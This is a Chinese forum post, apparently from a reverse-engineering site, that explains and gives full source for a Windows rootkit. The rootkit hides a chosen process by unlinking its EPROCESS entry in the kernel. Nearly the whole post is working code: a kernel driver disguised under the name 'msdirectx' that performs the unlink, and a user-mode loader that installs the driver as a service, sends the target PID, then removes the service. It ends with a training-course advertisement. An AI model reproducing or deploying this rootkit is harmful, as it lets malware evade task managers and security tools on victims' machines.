Windows NT/2000/XP/2003操作系统具有描述了进程的可执行对象。Taskmgr.exe列出机器上运行的进程。ZwQuerySystemInformation 也使用这 些 对象列出运行的进程,修改这 些 对象,可以隐藏进程。
通过遍历 在每 个进程的EPROCESS结构中引用的一个双向链表,EPROCESS结构包含一个具有指针成员FLINK和BLINK的lLIST_ENTRY结构。这两个指针分别指向当前进程描述符的前方和后方进程,通过修改这 两个指针可以隐藏指定进程。
本程序通过用户空间程序获的进程ID,EPROCESS块 中FLINK和 PID的偏移量 ,传送给驱动程序,驱动程序修改链表隐藏进程。而通过PsGetCurrentProcess可以得到当前进程的指针,顺藤摸瓜就可找到要隐藏的进程。以下是代码。
驱动程序
#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
typedef BOOLEAN BOOL;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
#define FILE_DEVICE_ROOTKIT 0x00002a7b
#define IOCTL_ROOTKIT_INIT (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEME (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
int FLINKOFFSET;
int PIDOFFSET;
PDEVICE_OBJECT g_RootkitDevice;
const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx";
#define DebugPrint DbgPrint
DWORD FindProcessEPROC(int);//遍历链表寻找要隐藏的进程的函数
NTSTATUS RootkitDispatch(IN PDEVICE_OBJECT, IN PIRP);
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
NTSTATUS RootkitDeviceControl(IN PFILE_OBJECT, IN BOOLEAN, IN PVOID,
IN ULONG, OUT PVOID, IN ULONG, IN ULONG,
OUT PIO_STATUS_BLOCK, IN PDEVICE_OBJECT
);
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT DriverObject,
IN PUNICODE_STRING RegistryPath
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceNameUnicodeString;
UNICODE_STRING deviceLinkUnicodeString;
RtlInitUnicodeString (&deviceNameUnicodeString,
deviceNameBuffer );
RtlInitUnicodeString (&deviceLinkUnicodeString,
deviceLinkBuffer );
ntStatus = IoCreateDevice ( DriverObject,
0, // For driver extension
&deviceNameUnicodeString,
FILE_DEVICE_ROOTKIT,
0,
TRUE,
&g_RootkitDevice );
if( NT_SUCCESS(ntStatus)) {
ntStatus = IoCreateSymbolicLink (&deviceLinkUnicodeString,
&deviceNameUnicodeString );
DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] =
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = RootkitDispatch;
DriverObject->DriverUnload = RootkitUnload;
}
else
{
DebugPrint(("Failed to create device!\n"));
return ntStatus;
}
return STATUS_SUCCESS;
} NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
UNICODE_STRING deviceLinkUnicodeString;
PDEVICE_OBJECT p_NextObj;
p_NextObj = DriverObject->DeviceObject;
if (p_NextObj != NULL)
{
RtlInitUnicodeString( &deviceLinkUnicodeString, deviceLinkBuffer );
IoDeleteSymbolicLink( &deviceLinkUnicodeString );
IoDeleteDevice( DriverObject->DeviceObject );
return STATUS_SUCCESS;
}
return STATUS_SUCCESS;
}
NTSTATUS
RootkitDispatch(
IN PDEVICE_OBJECT DeviceObject,
IN PIRP Irp
)
{
PIO_STACK_LOCATION irpStack;
PVOID inputBuffer;
PVOID outputBuffer;
ULONG inputBufferLength;
ULONG outputBufferLength;
ULONG ioControlCode;
NTSTATUS ntstatus;
ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
irpStack = IoGetCurrentIrpStackLocation (Irp);
inputBuffer = Irp->AssociatedIrp.SystemBuffer;
inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
outputBuffer = Irp->AssociatedIrp.SystemBuffer;
outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;
switch (irpStack->MajorFunction) {
case IRP_MJ_CREATE:
break;
case IRP_MJ_SHUTDOWN:
break;
case IRP_MJ_CLOSE:
break;
case IRP_MJ_DEVICE_CONTROL:
ntstatus = RootkitDeviceControl( irpStack->FileObject, TRUE,
inputBuffer, inputBufferLength,
outputBuffer, outputBufferLength,
ioControlCode, &Irp->IoStatus, DeviceObject );
break;
}
IoCompleteRequest( Irp, IO_NO_INCREMENT );
return ntstatus;
} NTSTATUS
RootkitDeviceControl(
IN PFILE_OBJECT FileObject,
IN BOOLEAN Wait,
IN PVOID InputBuffer,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer,
IN ULONG OutputBufferLength,
IN ULONG IoControlCode,
OUT PIO_STATUS_BLOCK IoStatus,
IN PDEVICE_OBJECT DeviceObject
)
{
NTSTATUS ntStatus;
UNICODE_STRING deviceLinkUnicodeString;
int find_PID = 0;
DWORD eproc = 0x00000000;
DWORD start_eproc= 0x00000000;
PLIST_ENTRY plist_active_procs = NULL;
IoStatus->Status = STATUS_SUCCESS;
IoStatus->Information = 0;
switch ( IoControlCode )
{
case IOCTL_ROOTKIT_INIT:
if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
PIDOFFSET = (int) (*(int *)InputBuffer);//从用户空间得到PID和FLINKOFFSET
FLINKOFFSET = (int) (*((int *)InputBuffer+1));
break;
case IOCTL_ROOTKIT_HIDEME:
if ((InputBufferLength < sizeof(DWORD)) || (InputBuffer == NULL))
{
IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
break;
}
find_PID = *((DWORD *)InputBuffer);//从用户空间程序得到隐藏进程ID号
if (find_PID == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
eproc = FindProcessEPROC(find_PID);//通过ID号找到对应进程
if (eproc == 0x00000000)
{
IoStatus->Status = STATUS_INVALID_PARAMETER;
break;
}
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);//隐藏进程
*((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
*((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
break;
default:
IoStatus->Status = STATUS_INVALID_DEVICE_REQUEST;
break;
}
return IoStatus->Status;
}
DWORD FindProcessEPROC (int terminate_PID)
{
DWORD eproc = 0x00000000;
int current_PID = 0;
int start_PID = 0;
int i_count = 0;
PLIST_ENTRY plist_active_procs;
if (terminate_PID == 0)
return terminate_PID;
eproc = (DWORD) PsGetCurrentProcess();//得到当前进程的PLIST_ENTRY
start_PID = *((DWORD*)(eproc+PIDOFFSET));//PIDOFFSET为PLIST_ENTRY中保存进程ID的偏移量。
current_PID = start_PID;
while(1)//遍历链表比较进程ID找到要隐藏的进程的PLIST_ENTRY
{
if(terminate_PID == current_PID)
return eproc;
else if((i_count >= 1) && (start_PID == current_PID))
{
return 0x00000000;
}
else {
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
eproc = (DWORD) plist_active_procs->Flink;
eproc = eproc - FLINKOFFSET;
current_PID = *((int *)(eproc+PIDOFFSET));
i_count++;
}
}
} 2 用户空间程序
#include "stdafx.h"
#include <windows.h>
#include <stdio.h>
#include <process.h>
#include <tlhelp32.h>
#include <string.h>
#include <winioctl.h>
#include <winsvc.h>
#include <tchar.h>
#include <stdlib.h>
#define SECURITY_STRING_LEN 168
#define LG_PAGE_SIZE 4096
#define MAX_KEY_LENGTH 1024
#define LG_SLEEP_TIME 4000
#define FILE_DEVICE_ROOTKIT 0x00002a7b
#define IOCTL_ROOTKIT_HIDEME (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_INIT (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
HANDLE gh_Device = INVALID_HANDLE_VALUE;
static CHAR ac_driverLabel[]="msdirectx";
static CHAR ac_driverName[]="msdirectx.sys";
DWORD pid;
HANDLE h_Device = INVALID_HANDLE_VALUE;
DWORD d_bytesRead, d_error;
CHAR ac_driverPath[MAX_PATH];
BOOL bOsVersionInfoEx;
BOOL Found = FALSE;
CHAR acModulePath[MAX_PATH];
int pid_offset = 0;
int flink_offset = 0;
int authid_offset = 0;
int token_offset = 0;
int privcount_offset = 0;
int privaddr_offset = 0;
int sidcount_offset = 0;
int sidaddr_offset = 0;
char m_szDriverExt[MAX_PATH];
char DriverName[MAX_PATH];
char sz_drivername[MAX_PATH];
char m_szDriverFullPath[MAX_PATH];
PROCESSENTRY32 stProcess;
const BYTE g_szSecurity[SECURITY_STRING_LEN]=
{
0x01,0x00,0x14,0x80,0x90,0x00,0x00,0x00,0x9c,0x00,0x00,0x00,0x14,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x02,
0x00,0x1c,0x00,0x01,0x00,0x00,0x00,0x02,0x80,0x14,0x00,0xff,0x01,0x0f,0x00,0x01,0x01,0x00,0x00,0x00,0x00,
0x00,0x01,0x00,0x00,0x00,0x00,0x02,0x00,0x60,0x00,0x04,0x00,0x00,0x00,0x00,0x00,0x14,0x00,0xfd,0x01,0x02,
0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x12,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xff,0x01,0x0f,0x00,
0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x20,0x02,0x00,0x00,0x00,0x00,0x14,0x00,0x8d,
0x01,0x02,0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x0b,0x00,0x00,0x00,0x00,0x00,0x18,0x00,0xfd,0x01,
0x02,0x00,0x01,0x02,0x00,0x00,0x00,0x00,0x00,0x05,0x20,0x00,0x00,0x00,0x23,0x02,0x00,0x00,0x01,0x01,0x00,
0x00,0x00,0x00,0x00,0x05,0x12,0x00,0x00,0x00,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x05,0x12,0x00,0x00,0x00
}; /*******************************************************************************\
*
* 函数及实现
*
\*******************************************************************************/
void PrintLastError(int errorno)
{
#if defined(DEBUG) || defined(_DEBUG)
LPVOID lpMsgBuf;
if(0==errorno)
{
errorno=GetLastError();
}
FormatMessage( FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,NULL,errorno,0,(LPTSTR) &lpMsgBuf,0,NULL);
#ifdef _CONSOLE
printf("%s\r\n",lpMsgBuf);
#else
MessageBox(NULL,(LPCTSTR)lpMsgBuf,"错误",MB_OK|MB_TOPMOST);
#endif
LocalFree(lpMsgBuf);
#endif
}
bool SplitFilePath(const char* szFullPath,char* szPath,char* szFileName,char* szFileExt)
{
char* p,*q,*r;
size_t len;
if(NULL==szFullPath)
{
return false;
}
p=(char*)szFullPath;
len=strlen(szFullPath);
if(szPath)
{
szPath[0]=0;
}
if(szFileName)
{
szFileName[0]=0;
}
if(szFileExt)
{
szFileExt[0]=0;
}
q=p+len;
while(q>p)
{
if( *q=='\\' || *q=='/')
{
break;
}
q--;
}
if(q<=p)
{
return false;
}
if(szPath)
{
memcpy(szPath,p,q-p+1);
szPath[q-p+1]=0;
}
q++;
p=q;
r=NULL;
while(*q)
{
if(*q=='.')
{
r=q;
}
q++;
}
if(NULL==r)
{
if(szFileName)
{
memcpy(szFileName,p,q-p+1);
}
}
else
{
if(szFileName)
{
memcpy(szFileName,p,r-p);
szFileName[r-p]=0;
}
if(szFileExt)
{
memcpy(szFileExt,r+1,q-r+1);
}
}
return true;
}
int InstallDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
char szBuf[LG_PAGE_SIZE];
HKEY hKey;
DWORD dwData;
if( NULL==cszDriverName || NULL==cszDriverFullPath )
{
return -1;
}
memset(szBuf,0,LG_PAGE_SIZE);
strcpy(szBuf,"SYSTEM\\CurrentControlSet\\Services\\");
strcat(szBuf,cszDriverName);
if(RegCreateKeyEx(HKEY_LOCAL_MACHINE,szBuf,0,"",0,KEY_ALL_ACCESS,NULL,&hKey,(LPDWORD)&dwData)!=ERROR_SUCCESS)
{
return -1;
}
strcpy(szBuf,cszDriverName);
if(RegSetValueEx(hKey,"DisplayName",0,REG_SZ,(CONST BYTE*)szBuf,(DWORD)strlen(szBuf))!=ERROR_SUCCESS)
{
return -1;
}
dwData=1;
if(RegSetValueEx(hKey,"ErrorControl",0,REG_DWORD,(CONST BYTE*)&dwData,sizeof(DWORD))!=ERROR_SUCCESS)
{
return -1;
}
strcpy(szBuf,"\\??\\");
strcat(szBuf,cszDriverFullPath);
if(RegSetValueEx(hKey,"ImagePath",0,REG_SZ,(CONST BYTE*)szBuf,(DWORD)strlen(szBuf))!=ERROR_SUCCESS)
{
return -1;
}
dwData=3;
if(RegSetValueEx(hKey,"Start",0,REG_DWORD,(CONST BYTE*)&dwData,sizeof(DWORD))!=ERROR_SUCCESS)
{
return -1;
}
dwData=1;
if(RegSetValueEx(hKey,"Type",0,REG_DWORD,(CONST BYTE*)&dwData,sizeof(DWORD))!=ERROR_SUCCESS)
{
return -1;
}
RegFlushKey(hKey);
RegCloseKey(hKey);
strcpy(szBuf,"SYSTEM\\CurrentControlSet\\Services\\");
strcat(szBuf,cszDriverName);
strcat(szBuf,"\\Security");
if(RegCreateKeyEx(HKEY_LOCAL_MACHINE,szBuf,0,"",0,KEY_ALL_ACCESS,NULL,&hKey,(LPDWORD)&dwData)!=ERROR_SUCCESS)
{
return -1;
}
dwData=SECURITY_STRING_LEN;
if(RegSetValueEx(hKey,"Security",0,REG_BINARY,g_szSecurity,dwData)!=ERROR_SUCCESS)
{
return -1;
}
RegFlushKey(hKey);
RegCloseKey(hKey);
return 0;
}
int CreateDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
SC_HANDLE schManager;
SC_HANDLE schService;
SERVICE_STATUS svcStatus;
bool bStopped=false;
int i;
if( NULL==cszDriverName || NULL==cszDriverFullPath )
{
return -1;
}
schManager=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(NULL==schManager)
{
return -1;
}
schService=OpenService(schManager,cszDriverName,SERVICE_ALL_ACCESS);
if(NULL!=schService)
{
if(ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus))
{
if(svcStatus.dwCurrentState!=SERVICE_STOPPED)
{
if(0==ControlService(schService,SERVICE_CONTROL_STOP,&svcStatus))
{
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return -1;
}
for(i=0;i<10;i++)
{
if( ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus)==0 || svcStatus.dwCurrentState==SERVICE_STOPPED )
{
bStopped=true;
break;
}
Sleep(LG_SLEEP_TIME);
}
if(!bStopped)
{
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return -1;
}
}
}
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return 0;
}
schService=CreateService(schManager,cszDriverName,cszDriverName,SERVICE_ALL_ACCESS,SERVICE_KERNEL_DRIVER,SERVICE_SYSTEM_START,SERVICE_ERROR_NORMAL,cszDriverFullPath,NULL,NULL,NULL,NULL,NULL);
if(NULL==schService)
{
CloseServiceHandle(schManager);
return -1;
}
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return 0;
}
int StartDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
SC_HANDLE schManager;
SC_HANDLE schService;
SERVICE_STATUS svcStatus;
bool bStarted=false;
int i;
if(NULL==cszDriverName)
{
return -1;
}
if(CreateDriver(cszDriverName,cszDriverFullPath)<0)
{
return -1;
}
schManager=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(NULL==schManager)
{
return -1;
}
schService=OpenService(schManager,cszDriverName,SERVICE_ALL_ACCESS);
if(NULL==schService)
{
CloseServiceHandle(schManager);
return -1;
}
if(ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus))
{
if(svcStatus.dwCurrentState==SERVICE_RUNNING)
{
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return 0;
}
}
else if(GetLastError()!=ERROR_SERVICE_NOT_ACTIVE)
{
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return -1;
}
if(0==StartService(schService,0,NULL))
{
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
PrintLastError(0);
return -1;
}
for(i=0;i<10;i++)
{
if( ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus) && svcStatus.dwCurrentState==SERVICE_RUNNING )
{
bStarted=true;
break;
}
Sleep(LG_SLEEP_TIME);
}
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return bStarted?0:-1;
}
int StopDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
SC_HANDLE schManager;
SC_HANDLE schService;
SERVICE_STATUS svcStatus;
bool bStopped=false;
int i;
schManager=OpenSCManager(NULL,0,0);
if(NULL==schManager)
{
return -1;
}
schService=OpenService(schManager,cszDriverName,SERVICE_ALL_ACCESS);
if(NULL==schService)
{
CloseServiceHandle(schManager);
return -1;
}
if(ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus))
{
if(svcStatus.dwCurrentState!=SERVICE_STOPPED)
{
if(0==ControlService(schService,SERVICE_CONTROL_STOP,&svcStatus))
{
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return -1;
}
for(i=0;i<10;i++)
{
if( ControlService(schService,SERVICE_CONTROL_INTERROGATE,&svcStatus)==0 || svcStatus.dwCurrentState==SERVICE_STOPPED )
{
bStopped=true;
break;
}
Sleep(LG_SLEEP_TIME);
}
if(!bStopped)
{
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return -1;
}
}
}
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return 0;
}
int DeleteDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
SC_HANDLE schManager;
SC_HANDLE schService;
SERVICE_STATUS svcStatus;
schManager=OpenSCManager(NULL,0,0);
if(NULL==schManager)
{
return -1;
}
schService=OpenService(schManager,cszDriverName,SERVICE_ALL_ACCESS);
if(NULL==schService)
{
CloseServiceHandle(schManager);
return -1;
}
ControlService(schService,SERVICE_CONTROL_STOP,&svcStatus);
if(0==DeleteService(schService))
{
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return -1;
}
CloseServiceHandle(schService);
CloseServiceHandle(schManager);
return 0;
}
LONG RegDeleteKeyNT(HKEY hStartKey,LPTSTR pKeyName)
{
DWORD dwSubKeyLength;
LPTSTR pSubKey=NULL;
TCHAR szSubKey[MAX_KEY_LENGTH];
HKEY hKey;
LONG lRet;
if( pKeyName && lstrlen(pKeyName) )
{
if((lRet=RegOpenKeyEx(hStartKey,pKeyName,0,KEY_ENUMERATE_SUB_KEYS|DELETE,&hKey))==ERROR_SUCCESS)
{
while(lRet==ERROR_SUCCESS)
{
dwSubKeyLength=MAX_KEY_LENGTH;
lRet=RegEnumKeyEx(hKey,0,szSubKey,(LPDWORD)&dwSubKeyLength,NULL,NULL,NULL,NULL);
if(lRet==ERROR_NO_MORE_ITEMS)
{
lRet=RegDeleteKey(hStartKey,pKeyName);
break;
}
else if(lRet==ERROR_SUCCESS)
{
lRet=RegDeleteKeyNT(hKey,szSubKey);
}
}
RegCloseKey(hKey);
}
}
else
{
lRet=ERROR_BADKEY;
}
return lRet;
}
int RemoveDriver(const char* cszDriverName,const char* cszDriverFullPath)
{
HKEY hKey;
long errorno;
char szBuf[LG_PAGE_SIZE];
char szDriverName[MAX_PATH];
memset(szBuf,0,LG_PAGE_SIZE);
memset(szDriverName,0,MAX_PATH);
strcpy(szDriverName,cszDriverName);
strcpy(szBuf,"SYSTEM\\CurrentControlSet\\Services\\");
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,szBuf,0,KEY_ALL_ACCESS,&hKey)!=ERROR_SUCCESS)
{
return -1;
}
if((errorno=RegDeleteKeyNT(hKey,szDriverName))!=ERROR_SUCCESS)
{
return -1;
}
RegCloseKey(hKey);
return 0;
}
DWORD HideProc(const char *ProcessName)
{
DWORD d_bytesRead;
DWORD success=-1;
OSVERSIONINFOEX osvi;
HANDLE hSnapShot;
BOOL status;
int *os_offsets;
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);//不同版本的Windows有不同的 PID和FLINK偏移量
if( !(bOsVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) &osvi)) )
{
osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);
if (! GetVersionEx ( (OSVERSIONINFO *) &osvi) )
return -1;
}
switch (osvi.dwPlatformId)
{
case VER_PLATFORM_WIN32_NT:
if ( osvi.dwMajorVersion == 4 && osvi.dwMinorVersion == 0)
{
pid_offset = 148;//就用了这pid_offset和flink_offset这两个变量,别的没用,
flink_offset = 152;
authid_offset = 24;
token_offset = 264;
privcount_offset = 52;
privaddr_offset = 80;
sidcount_offset = 48;
sidaddr_offset = 72;
Found = TRUE;
}
else if ( osvi.dwMajorVersion == 5 && \
osvi.dwMinorVersion == 0 )
{
pid_offset = 156;
flink_offset = 160;
authid_offset = 0x18;
token_offset = 0x12c;
privcount_offset = 0x44;
privaddr_offset = 0x64;
sidcount_offset = 0x3c;
sidaddr_offset = 0x58;
Found = TRUE;
}
else if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 1 )
{
pid_offset = 132;
flink_offset = 136;
authid_offset = 24;
token_offset = 200;
privcount_offset = 72;
privaddr_offset = 104;
sidcount_offset = 64;
sidaddr_offset = 92;
Found = TRUE;
}
else if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2 )
{
pid_offset = 132;
flink_offset = 136;
authid_offset = 24;
token_offset = 200;
privcount_offset = 84;
privaddr_offset = 116;
sidcount_offset = 76;
sidaddr_offset = 104;
Found = TRUE;
}
break;
default:
fprintf(stderr, "\nOperating System Version %d.%d Not Supported!\n", osvi.dwMajorVersion, osvi.dwMinorVersion);
return -1;
break;
}
if (!Found)
{
return -1;
}
os_offsets = (int *)calloc(1, sizeof(int)*8);
if (!os_offsets)
{
//fprintf(stderr, "Memory allocation failed.\n");
return -1;
}
memcpy(os_offsets, &pid_offset, sizeof(int));
memcpy(os_offsets + 1, &flink_offset, sizeof(int));
memcpy(os_offsets + 2, &authid_offset, sizeof(int));
memcpy(os_offsets + 3, &token_offset, sizeof(int));
memcpy(os_offsets + 4, &privcount_offset, sizeof(int));
memcpy(os_offsets + 5, &privaddr_offset, sizeof(int));
memcpy(os_offsets + 6, &sidcount_offset, sizeof(int));
memcpy(os_offsets + 7, &sidaddr_offset, sizeof(int)); stProcess.dwSize=sizeof(stProcess);
hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
status=Process32First(hSnapShot,&stProcess);//用快照函数获取进程ID
while(status)
{
if(!strcmp(ProcessName,stProcess.szExeFile))
{
printf("the ProcessName is %s,ID is %d\n",stProcess.szExeFile,stProcess.th32ProcessID);
pid=stProcess.th32ProcessID;
}
status=Process32Next(hSnapShot,&stProcess);
}
h_Device=CreateFile("\\\\.\\msdirectx",GENERIC_READ+GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL);//!=INVALID_HANDLE_VALUE)
if(h_Device!=INVALID_HANDLE_VALUE)
{
if(!DeviceIoControl(h_Device, IOCTL_ROOTKIT_INIT,
os_offsets,
sizeof(int)*8,
NULL,
0,
&d_bytesRead,
NULL))
return -1;
success = DeviceIoControl(h_Device,
IOCTL_ROOTKIT_HIDEME,
(void *) &pid,
sizeof(DWORD),
NULL,
0,
&d_bytesRead,
NULL);
}
else
{
printf("can not open device\n");
return success;
}
CloseHandle(h_Device);
return success;
}
BOOL DeleteDeviceDriver()//char *DriverName)
{
if(0>StopDriver(DriverName,m_szDriverFullPath))
{
printf("StopDriver failed\n");
return FALSE;
}
else if(0>RemoveDriver(DriverName,m_szDriverFullPath))
{
printf("Remove Driver failed\n");
return FALSE;
}
return TRUE;
}
BOOL LoadDeviceDriver()//char *DriverName)
{
if (GetCurrentDirectory(MAX_PATH, m_szDriverFullPath))
{
strncat(m_szDriverFullPath,"\\",MAX_PATH-strlen(m_szDriverFullPath));
strncat(m_szDriverFullPath,"msdirectx.sys",MAX_PATH-strlen(m_szDriverFullPath));
SplitFilePath(m_szDriverFullPath,ac_driverPath,DriverName,m_szDriverExt);
if(0>InstallDriver(DriverName,m_szDriverFullPath))
{
printf("install failed \n");
return FALSE;
}
else if(0>StartDriver(DriverName,m_szDriverFullPath))
{
printf("Start failed\n");
return FALSE;
}
}
return TRUE;
}
int main()
{
const int PROCNAMELEN=26;
char *buffer,*start,*ProcessName=new char[MAX_PATH];
printf("输入隐藏进程名\n");
scanf("%s",ProcessName);
if(!LoadDeviceDriver())//sz_drivername))//启动驱动程序
return 0;
HideProc(ProcessName);//隐藏进程
if(!(DeleteDeviceDriver()))//sz_drivername)))
return 0;
// printf("Hello World!\n");
return 0;
}
/*
void main()
{
}*/
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)